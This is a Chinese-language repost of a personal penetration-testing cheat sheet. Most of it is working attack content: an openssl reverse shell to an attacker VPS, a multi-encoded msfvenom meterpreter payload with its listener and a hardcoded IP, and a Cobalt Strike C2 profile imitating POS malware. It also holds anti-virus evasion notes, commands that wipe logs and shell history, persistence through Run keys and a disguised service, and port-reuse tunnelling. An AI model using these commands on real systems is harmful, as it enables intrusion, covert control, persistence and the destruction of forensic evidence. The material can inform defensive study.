前言
浅蓝的渗透测试导图以及小工具
# 拉取镜像docker pull leishianquan/awvs-nessus:v1# 启动docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1# 查看容器docker ps –a# 启动容器docker start container-id# 进入容器docker exec –it container-id /bin/bash# 进入容器后,启动nessusstart# 访问扫描器地址和账号密码Nessus:https://127.0.0.1:8834/#/account:leishi/leishianquanAwvs13:https://127.0.0.1:13443/account:[email protected]/Admin123
ZERO
一.时刻关注返回的数据包
-
验证码与邮箱以及token的返回泄露,以及后台为校验从而可删除的参数。截获的敏感数据参数,学会在多个数据包反复尝试。从某个成功请求中捕获数据包观察cookie或者token是否存在规律或加密。通过修改返回的状态值,触发js进行逻辑漏洞的渗透。token的key参数解密构建获取真实user密钥,可拼接、规律、时间戳……
进谷歌 找注入没注入 就旁注没旁注 用0day没0day 猜目录没目录 就嗅探爆账户 找后台传小马 放大马拿权限 挂页面放暗链 清数据渗透企业实战版搞企业 先扫描扫描器 商业好默密码 都知道社工库 找一找邮箱号 先列好九头蛇 跑一跑搞不定 放大招找插件 挖一挖发邮件 凭伪造没邮箱 搞网站二级域 皆可爆老漏洞 没修好新漏洞 刷一票干研发 Git 找源代码 全都要C D N 可以跳防火墙 可以撬堡垒机 可以秒云防护 可以秒是企业 没有哪家搞不了!
三.WEBBYPASS
上生成 ssl 证书的公钥/私钥对:openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes监听反弹 shell:openssl s_server -quiet -key key.pem -cert cert.pem -port 80shell:mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <your_vps>:1024 > /tmp/s; rm /tmp/sVPS 上已获取加密的 getshell 了。
四.提权与权限维持
###生成证书并写入文件openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout rsaprivate.key -out servercertificate.crtcat rsaprivate.key servercertificate.crt >my.pem###生成payloadmsfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "x00x0ax0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw###监听msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'
老牌工具Cobaltstrike+Profiles
keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.storeset sample_name "tryblog POS Malware";set sleeptime "5000"; # use a ~30s delay between callbacksset jitter "10"; # throw in a 10% jitterset useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";#设置证书,注意以下内容得和你之前生成的证书一样https-certificate {set CN "TRY";set O "TRY";set C "TRY";set L "TRY";set OU "TRY";set ST "TRY";set validity "365";}#设置,修改成你的证书名称和证书密码code-signer{set keystore "tryblog.store";set password "tryblog";set alias "tryblog";}#指定DNS beacon不用的时候指定到IP地址set dns_idle "8.8.4.4";#每个单独DNS请求前强制睡眠时间set dns_sleep "0";#通过DNS上载数据时主机名的最大长度[0-255]set maxdns "235";http-post {set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";client {header "Accept" "text/plain";header "Accept-Language" "en-us";header "Accept-Encoding" "text/plain";header "Content-Type" "application/x-www-form-urltrytryd";id {netbios;parameter "id";}output {base64;prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";print;}}server {output {print;}}}http-get {set uri "/updates";client {metadata {netbiosu;prepend "user=";header "Cookie";}}server {header "Content-Type" "text/plain";output {base64;print;}}}
C2.profileip:prot ./C2.profilejava -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
免杀远控整理(来自Tide团队)
windows下的免杀生成(顺序从上到下依次混淆)
python3 -m http.server 8080
Veil
一些payload加料的技巧
windows
linux
五、日志清理(细心的安全工程师会更改位置并定时备份后渗透主要还是靠细心)
windows
防火墙日志路径:%systemroot%system32logfilesIIS日志路径:%systemroot%system32logfleswindows系统日志:%systemroot%system32configScheduler服务日志:%systemroot%schedlgu.txt日志在注册表的键:HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog系统日志:%SystemRoot%System32WinevtLogsSystem.evtx安全日志:%SystemRoot%System32WinevtLogsSecurity.evtx应用程序日志:%SystemRoot%System32WinevtLogsApplication.evtx
linux(检索根目录以及上级目录是否存在备份)
history -cecho “”> /root/.bash_historyecho “”> /var/run/utmp
/var/log/boot.log:录了系统在引导过程中发生的事件,就是Linux系统开机自检过程显示的信息/var/log/lastlog :记录最后一次用户成功登陆的时间、登陆IP等信息/var/log/messages :记录Linux操作系统常见的系统和服务错误信息/var/log/secure :Linux系统安全日志,记录用户和工作组变坏情况、用户登陆认证情况/var/log/btmp :记录Linux登陆失败的用户、时间以及远程IP地址/var/log/syslog:只记录警告信息,常常是系统出问题的信息,使用lastlog查看/var/log/wtmp:该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件,使用last命令查看/var/log/maillog 与邮件相关的日志信息/var/log/cron 与定时任务相关的日志信息/var/log/spooler 与UUCP和news设备相关的日志信息/var/log/auth.log 系统授权信息,包括用户登录和使用的权限机制等 (debian)/var/run/utmp:该日志文件记录有关当前登录的每个用户的信息。如 who、w、users、finger等就需要访问这个文件
web容器路径
apche:C:Program FilesApache Software FoundationApache2.2htdocs"tomact:CProgram Filestomcatlognignx: CProgram Filesnginx-1.14.2logs
tomcat:/usr/local/tomcat/logs/apche:/usr/local/apache/logs/access_lognignx:/var/log/httpd/error_log rm -f -r /var/log/*
frsocks+protoplex+流量重定向实现端口复用
./frsocks -sockstype fsocks -listen 2333 //创建本地监听./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999 //端口分流,根据协议类型转到本地的2333和80端口
sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129netsh interface portproxy show all //查看转发规则netsh interface portproxy reset //清除所有转发规则
将 IP 流量封装进 IMCP 的 ping 数据包进行传输
后渗透
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:UsersKingXL1.exe" /freg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "test" /t REG_SZ /d "C:UsersKingXL1.exe" /f
sc create "server power" binpath= "C:WindowsSystem32config.exe"//设置服务的描述字符串sc description "server power" "description"//设置这个服务为自动启动sc config "server power" start= autonet start "server power" 启动服务
八、 一个便捷的HACK浏览器(上火狐开发者版本也不错)
作者:Own master.转自:https://xlmy.net,排版白帽子左一原文始发于微信公众号(菜鸟学信安):干货|个人渗透技巧汇总(避坑)笔记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论